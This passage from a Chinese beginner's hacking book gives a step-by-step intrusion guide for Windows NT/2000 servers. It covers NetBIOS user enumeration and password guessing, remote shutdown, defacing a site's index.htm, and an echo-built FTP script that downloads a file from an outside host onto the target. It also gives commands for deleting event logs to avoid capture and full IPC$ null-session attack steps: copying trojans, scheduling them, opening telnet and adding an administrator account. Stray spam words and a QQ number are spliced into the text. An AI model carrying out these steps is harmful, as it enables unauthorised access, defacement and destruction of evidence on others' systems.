粉红色的那行就是对方主页存放地址,这里告 诉大家一个技巧,很笨的技巧啊,不过只能用这个
方法才能100%地找到主页的名称,当你DIR这个目
录时,一定会看到很多文件,你可以把所有文件在
浏览器这样输入XX.XX.XX.XX/文件名,这样只要看
到和XX.XX.XX.XX看到的页面一模一样,那么这就 42 是主页的名称了。 7.nbtstat
如果你扫到一部WindowsNT的电脑,他的136到
139其中一个端口开了的话,就要用这个命令得到用
户了。顺便告诉大家这是netbios,得到用户名后就
可以猜猜密码了。例如比较简单的密码,密码和用
户名一样的,都试一下,不行就暴力破解吧! 现在网上很多NT的机子都开了这些端口的,你
可以练习一下,我们来分析得到的结果。 命令是 nbtstat -A XX.XX.XX.XX
-A一定要大写哦。 下面是得到的结果。 NetBIOS Remote Machine Name Table
Name Type Status
Registered Registered Registered Regis
tered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登录过这部系统的用户交换空间 卧室,可能你
不知道怎么看,大家是不是看到了一串数字,只要
这串数字是<03>的话,那他前面的就是用户。 这里的用户是PENTIUMII。 8.Shutdown
关了对方的NT服务器的命令
Shutdown \IP地址 t:2020秒后将NT自动关闭,三思后才能运行这个命
第1 章菜鸟黑客入门
令,这样会给对方造成很大的损失,要做个有良心
的入侵者呀。 9.DIR
这个命令没什么好讲,但是却非常重要,他是查
看一目录里的所有文件、文件夹。
你可以在本地试一下。 10.echo
著名的漏洞Unicode装修交换空间,这个命令可以简单地黑一
下有这个漏洞的主机。
假设我们要把“实践是检验真理的唯一标准!” 写入index.htm,有两种方法,大家看看有什么区别。
echo 实践是检验真理的唯一标准!>index.htmecho 实践是检验真理的唯一标准!>>index.htm
第一个的意思是覆盖index.htm原有的内容,把 “实践是检验真理的唯一标准!”写进index.htm。
第二个的意思是把“实践是检验真理的唯一标
准!”加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原 文件内容覆盖。
大家可以在本地试一下。
可能你会问,这样简单黑一下有什么好玩的,其 实他可以用来下载主页到对方的目录里。 (1)首先,我们需要申请一个免费的主页空间。
(2)用echo在可写目录下建立如下内容的txt文
件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,
申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:inetpubwwwrootindex.htm(这 里是把你空间上的index.htm 下载到对方的c:
inetpubwwwrootindex.htm)..
bye(退出FTP对话,相当在98下的DOS,用EXIT 退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c: cnhack.txt
输入 echo cnhack >>c:cnhack.txt
输入 echo 39abs >>c:cnhack.txt
输入 echo get index.htm c:
inetpubwwwrootindex.htm+>>+c:cnhack.txt 最后输入 ftp -s:c:cnhack.txt (利用ftp
的-s 参数,执行文件里的内容。) 等命令完成时,文件已经下载到你指定的文件
里了。 注意:取得文件后,请删除cnhack.txt。(如
果不删除,很容易会给别人看到你的密码。) 记得要 del c:cnhack.txt 11.attrib
这个命令是设置文件属性的。如果你想黑一个
站,而它的主页的文件属性设置了只读,那就很可
怜呀,想删除他也不行,想覆盖他也不行。倒!不
过有这个命令就别怕了。 attrib -r index.htm
这个命令是把index.htm的只读属性去掉。 如果把“-”.. 改为“+”.. 则是把这个文件的属性设
置为只读。 attrib +r index.htm
这个命令是把index.htm的属性设置为只读。 12.del
当你看到这个标题可别倒下啊!现在要离开 127.0.0.1了,要删除日志,当然要删除日志啦!想
被捉吗。呵呵。 WindowsNT的日志有这些: del C:winntsystem32logfiles*.*
del C:winntssytem32config*.evt
del C:winntsystem32dtclog*.*
del C:winntsystem32*.log
del C:winntsystem32*.txt
del C:winnt*.txt
del C:winnt*.log
只要删除这些就可以了。有些WindowsNT安装在 D盘或其他盘,就要把C 改成相应的盘。 43
44
第2 章Windows 攻防
菜鸟必备IPC$ 详细解释大全
关于IPC$入侵的文章可谓多如牛毛,而且
也不乏优秀之作,攻击步骤甚至可以说已经成
为经典的模式,因此也没人愿意再把这已经成
为定式的东西拿出来摆弄。不过话虽这样说,但
我个人认为这些文章讲解的并不详细,对于第
一次接触ipc$的菜鸟来说,简单的罗列步骤并
不能解答他们的种种迷惑。因此我参考了部分
资料,教程以及网上的论坛帖子,写了这篇总结
性质的文章,想把一些容易混淆,容易迷惑人的
问题说清楚,让大家不要总徘徊在原地!
一、什么是IPC$
IPC$(Internet Process Connection) 是共享
“.. 命名管道”.. 的资源,.. 它是为了让进程间通信而开放
的命名管道,.. 通过提供可信任的用户名和口令,.. 连
接双方可以建立安全的通道并以此通道进行加密数
据的交换,.. 从而实现对远程计算机的访问。IPC$ 是
NT/2000 的一项新功能,.. 它有一个特点,.. 即在同一时
间内,.. 两个IP 之间只允许建立一个连接。NT/2000
在提供了IPC$ 功能的同时,.. 在初次安装系统时还打
开了默认共享,.. 即所有的逻辑共享(c$,d$,e$..)
和系统目录Winnt 或Windows(Admin$) 共享。所有的
这些,.. 微软的初衷都是为了方便管理员的管理交换空间的网址,.. 但
在有意无意中,.. 导致了系统安全性的降低。
平时我们总能听到有人在说IPC$ 漏洞,.. 其实
IPC$ 并不是一个真正意义上的漏洞, 我想之所以有人
这么说,.. 一定是指微软自己安置的那个‘.. 后门’:.. 空
会话(Null session )。那么什么是空会话呢?
二、什么是空会话
在介绍空会话之前,.. 我们有必要了解一下一个
安全会话是如何建立的。
在Windows NT 4.0 中是使用挑战响应协议与远
程机器建立一个会话的,.. 建立成功的会话将成为一
个安全隧道,.. 建立双方通过它互通信息,.. 这个过程
的大致顺序如下:
1).. 会话请求者(.. 客户).. 向会话接收者(.. 服务器)
传送一个数据包,.. 请求安全隧道的建立;
2).. 服务器产生一个随机的64 位数(.. 实现挑战)
传送回客户;
3).. 客户取得这个由服务器产生的64 位数,.. 用试
图建立会话的账号的口令打乱它,.. 将结果返回到服
务器(.. 实现响应);..
4 ).. 服务器接受响应后发送给本地安全验证
(LSA),LSA 通过使用该用户正确的口令来核实响应
以便确认请求者身份。如果请求者的账号是服务器
的本地账号,.. 核实本地发生;.. 如果请求的账号是一
个域的账号,.. 响应传送到域控制器去核实。当对挑
战的响应核实为正确后,.. 一个访问令牌产生,.. 然后
传送给客户。客户使用这个访问令牌连接到服务器
上的资源直到建议的会话被终止。
以上是一个安全会话建立的大致过程,.. 那么空
会话又如何呢?
空会话是在没有信任的情况下与服务器建立的
会话(.. 即未提供用户名与密码),.. 但根据WIN2000 的
访问控制模型,.. 空会话的建立同样需要提供一个令
牌,.. 可是空会话在建立过程中并没有经过用户信息
的认证,所以这个令牌中不包含用户信息,因此,这
个会话不能让系统间发送加密信息,.. 但这并不表示
空会话的令牌中不包含安全标识符SID(.. 它标识了用
户和所属组),.. 对于一个空会话,LSA 提供的令牌的
SID 是S-1-5-7,.. 这就是空会话的SID,.. 用户名是:
ANONYMOUS LOGON(.. 这个用户名是可以在用户列表中
看到的,.. 但是是不能在SAM 数据库中找到,属于系统内置的账号),这个访问令牌包含下面伪装的组: Everyone
Network
在安全策略的限制下,这个空会话将被授权访
问到上面两个组有权访问到的一切信息。那么建立
空会话到底可以作什么呢? 三、空会话可以做什么 对于NT,在默认安全设置下,借助空连接可以
列举目标主机上的用户和共享,访问everyone权限
的共享,访问小部分注册表等,并没有什么太大的
利用价值;对2000作用更小,因为在Windows 2000
和以后版本中默认只有管理员和备份操作员有权从
网络访问到注册表,而且实现起来也不方便,需借
助工具。从这些我们可以看到,这种非信任会话并
没有多大的用处,但从一次完整的IPC$入侵来看,
空会话是一个不可缺少的跳板,因为我们从它那里
可以得到用户列表,这对于一个老练的黑客已经足
够了。以下是空会话中能够使用的具体命令: 1.首先,我们先建立一个空会话(需要目标开放
IPC$)
命令:net use \ipIPC$ ""/user:"" 注意:上面的命令包括四个空格,net与use中 间有一个空格,use后面一个,密码左右各一个空格。 2.查看远程主机的共享资源
命令:net view \IP
解释:建立了空连接后,用此命令可以查看远程
主机的共享资源,如果它开了共享,可以得到如下
类似类似结果:
在 \*.*.*.*的共享资源 资源共享名类型用途注释
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。 3.查看远程主机的当前时间
命令:net time \IP
解释:用此命令可以得到一个远程主机的当前
时间。 4.得到远程主机的NetBIOS用户名列表(需要打
开自己的NBT)
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS 用 46 户名列表(需要你的netbios支持),返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情
 |  |  |  |
族,用于文件打印共享的服务;
2.NBT:(NetBIOS Over TCP/IP)使用137(UDP)
138(UDP)139(TCP)端口实现基于TCP/IP协议的
NetBIOS网络互联。
3.在WindowsNT中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT实现,还可以直接通
过445端口实现。
有了这些基础知识,我们就可以进一步来讨论
访问网络共享对端口的选择了:
对于Win2000客户端来说: 1.如果在允许NBT的情况下连接服务器时,客户
端会同时尝试访问139和445端口,如果445端口有
响应,那么就发送RST包给139端口断开连接,用455
端口进行会话,当445端口无响应时,才使用139端
口,如果两个端口都没有响应,则会话失败;
2.如果在禁止NBT的情况下连接服务器时,那么
客户端只会尝试访问445端口,如果445端口无响应,
那么会话失败。由此可见,禁止了NBT后的win 2000第2 章 Windows 攻防
对win NT的共享访问将会失败。
对于Win2000服务器端来说: 1.如果允许NBT, 那么UDP端口137, 138, TCP
端口 139, 445将开放;
2.如果禁止NBT,那么只有445端口开放。
我们建立的IPC$会话对端口的选择同样遵守以
上原则。显而易见,如果远程服务器没有监听139或
445端口,IPC$会话是无法建立的。 五、IPC$连接在hack攻击中的意义 就像上面所说的,即使你建立了一个空的连接,
你也可以获得不少的信息(而这些信息往往是入侵
中必不可少的),如果你能够以某一个具有一定权限
的用户身份登陆的话,那么你就会得到相应的权限,
显然,如果你以管理员身份登陆,嘿嘿,那你可就了
不得了,基本上可以为所欲为了。不过你也不要高
兴得太早,因为管理员的密码不是那么好搞到的,虽
然会有一些粗心的管理员存在弱口令,但这毕竟是
少数,而且现在不比从前了,随着人们安全意识的
提高,管理员们也愈加小心了,得到管理员密码将
会越来越难的,因此今后你最大的可能就是以极小
的权限甚至是没有权限进行连接,甚至在主机不开
启IPC$共享时,你根本就无法连接,你会慢慢地发
现IPC$连接并不是万能的,所以不要奢望每次连接
都能成功,那是不现实的。 是不是有些灰心?倒也不用,关键是我们要摆
正心态,不要把IPC$入侵当作终极武器,不要认为
它战无不胜,它只是很多入侵方法中的一种,你有可
能利用它一击必杀,也有可能一无所获,这些都是
正常的,在黑客的世界里,不是每条大路都能通往
罗马,但总有一条路会通往罗马,耐心地寻找吧! 六、IPC$连接失败的常见原因 以下是一些常见的导致IPC$连接失败的原因: 1.IPC连接是Windows NT及以上系统中特有的
功能,由于其需要用到Windows NT中很多DLL函数,
所以不能在Windows 9.x/Me系统中运行,也就是说
只有nt/2000/xp才可以相互建立IPC$连接,98/me
是不能建立IPC$连接的;
2.如果想成功地建立一个IPC$连接,就需要对
方开启IPC$共享,即使是空连接也是这样,如果对
方关闭了IPC$共享,你将会建立失败;
3.你未启动Lanmanworkstation服务交换空间重播,它提供网
络链结和通讯,没有它你无法发起连接请求(显示
名为:Workstation);.. 4.对方未启动Lanmanserver 服务,它提供了
RPC 支持、文件、打印以及命名管道共享,IPC$依
赖于此服务,没有它远程主机将无法响应你的连接
请求(显示名为:Server);..
5.对方未启动NetLogon,它支持网络上计算机
pass-through 账户登录身份;
6.对方禁止了NBT(即未打开139端口);..
7.对方防火墙屏蔽了139和445端口;
8.你的用户名或者密码错误(显然空会话排除
这种错误);..
9.命令输入错误:可能多了或少了空格,当用户
名和密码中不包含空格时两边的双引号可以省略,
如果密码为空,可以直接输入两个引号"" 即可;
10 如果在已经建立好连接的情况下对方重启计
算机,那么IPC$连接将会自动断开,需要重新建立
连接。 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问:很可能你使用的用户不是
管理员权限的,先提升权限; 错误号51,Windows无法找到网络路径:网络有
问题; 错误号53,找不到网络路径:ip地址错误;目
标未开机;目标lanmanserver服务未启动;目标有
防火墙(端口过滤);.. 错误号67,找不到网络名:你的lanmanworkstation
服务未启动或者目标删除了IPC$;
错误号1219,提供的凭据与已存在的凭据集冲
突:你已经和对方建立了一个IPC$,请删除再连;
错误号1326,未知的用户名或错误密码:原因
很明显了;
错误号1792,试图登录,但是网络登录服务没
有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有
账号策略,强制定期要求更改密码。 七、复制文件失败的原因 有些朋友虽然成功地建立了IPC$ 连接,但在
copy时却遇到了这样那样的麻烦,无法复制成功,那
么导致复制失败的常见原因又有哪些呢? 1.盲目复制
这类错误出现的最多,占到50%以上。许多朋友 47
甚至都不知道对方是否有共享文件夹,就进行盲目
复制,结果导致复制失败而且郁闷的很。因此我建
议大家在进行复制之前务必用net view \IP这个
命令看一下对方的共享情况,不要认为IPC$连接建
立成功了就一定有共享文件夹。 2.默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面: 1)错误地认为能建立IPC$连接的主机就一定开
启了默认共享,因而在建立完连接之后马上向
admin$ 之类的默认共享复制文件,导致复制失败。
IPC$连接成功只能说明对方打开了IPC$共享,IPC$
共享与默认共享是两码事,IPC$共享是一个命名管
道,并不是哪个实际的文件夹,而默认共享并不是
IPC$共享的必要条件; 2)由于net view \IP 无法显示默认共享(因
为默认共享带$),因此通过这个命令,我们并不能
判断对方是否开启了默认共享,因此如果对方未开
启默认共享,那么所有向默认共享进行的操作都不
能成功;(不过大部分扫描软件在扫弱口令的同时,
都能扫到默认共享目录,可以避免此类错误的发生) 3. 用户权限不够,包括四种情形
1)空连接向所有共享(默认共享和普通共享)复
制时,大多情况下权限是不够的; 2)向默认共享复制时,要具有管理员权限; 3)向普通共享复制时,要具有相应权限(即对
方事先设定的访问权限);.. 4)对方可以通过防火墙或安全软件的设置,禁
止外部访问共享; 还需要说明一点:不要认为administrator就一
定是管理员,管理员名称是可以改的。 4.被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,
被防火墙杀掉了,导致找不到文件;还有可能你把
木马复制到了局域网内的主机,导致连接失败。因
此建议你复制时要小心,否则就前功尽弃了。 大家也知道,IPC$连接在实际操作过程中会出
现千奇百怪的问题,上面我所总结的只是一些常见
错误,没说到的,只能让大家自己去体会了。 八、如何打开目标的IPC$共享以及
其他共享 目标的IPC$不是轻易就能打开的,否则就要天
下打乱了。你需要一个admin 权限的shell,比如 48 telnet、木马等,然后在shell下执行net shareIPC$来开放目标的IPC$,用net share IPC$ /del
来关闭共享。如果你要给它开共享文件夹,你可以
用net share baby=c:,这样就把它的c盘命名为
baby共享了。 九、一些需要shell才能完成的命令 看到很多教程这方面写的十分不准确,一些需
要shell才能完成命令就简简单单地在IPC$连接下
执行了,起了误导作用。那么下面我总结一下需要
在shell才能完成的命令: 1.向远程主机建立用户,激活用户,修改用户密
码,加入管理组的操作需要在shell下完成;
2.打开远程主机的IPC$共享央视交换空间,默认共享,普通
共享的操作需要在shell下完成;
3.运行/关闭远程主机的服务,需要在shell下
完成;
4.启动/杀掉远程主机的进程,也需要在shell
下完成。
十、入侵中可能会用到的相关命令 请注意命令适用于本地还是远程,如果适用于
本地,你只能在获得远程主机的shell后,才能向远
程主机执行。 1.建立空连接
net use \IPIPC$ ""/user:""
2.建立非空连接
net use \IPIPC$ "psw" /user:"account"
3.查看远程主机的共享资源(但看不到默认共享)
net view \IP
4.查看本地主机的共享资源(可以看到本地的
默认共享)
net share 5.得到远程主机的用户名列表
nbtstat -A IP
6.得到本地主机的用户列表
net user
7.查看远程主机的当前时间
net time \IP
8.显示本地主机当前服务
net start
9.启动/关闭本地服务
net start 服务名 /y第2 章 Windows 攻防
net stop 服务名 /y 10.映射远程共享
net use z: \IPbaby
此命令将共享名为baby的共享资源映射到z盘
11.删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部
12.向远程主机复制文件
copy 路径srv.exe \IP共享目录名,如:
copy ccbirds.exe \*.*.*.*c 即将当前目录
下的文件复制到对方c 盘内 13.远程添加计划任务
at \ip 时间程序名,如:
at \127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜
索路径(比如system32/)下不用加路径,否则必须
加全路径 14.开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各
大下载站点都有,而且还需要满足四个要求: 1)目标开启了IPC$共享 2)你要拥有管理员密码和账号 3)目标开启RemoteRegistry服务,用户就该
ntlm认证 4)对WIN2K/XP有效,NT未经测试 命令格式:OpenTelnet.exe \server account psw NTLM认证方式 port
试例如下:c:>OpenTelnet.exe \*.*.*.*
administrator ""1 90 15.激活用户/加入管理员组
1)net uesr account /active:yes
2)net localgroup administrators account
/add
16.关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \server account psw
试例如下:c:>ResumeTelnet.exe \*.*.*.*
administrator ""
17.删除一个已建立的IPC$连接
net use \IPIPC$ /del
十一、IPC$完整入侵步骤祥解 其实入侵步骤随个人爱好有所不同,下面是一 般常见的。 1.用扫描软件搜寻存在弱口令的主机,比如流
光,SSS,X-scan等,随你的便,然后锁定目标,如
果扫到了管理员权限的口令,你可以进行下面的步骤
了,假设你现在得到了administrator的密码为空。
2. 此时你有两条路可以选择:要么给对方开
telnet(命令行),要么给它传木马(图形界面)先
用telnet吧。
3.上面开telnet 的命令没忘吧,要用到
opentelnet这个小程序
c:>OpenTelnet.exe \192.168.21.* admin
istrator ""1 90
如果返回如下信息: Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
Usage:OpenTelnet.exe \server username
password NTLMAuthor telnetport
Connecting \192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:
NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully!
telnet service is running!
BINGLE!!!Yeah!!
Te>>>QQ470681378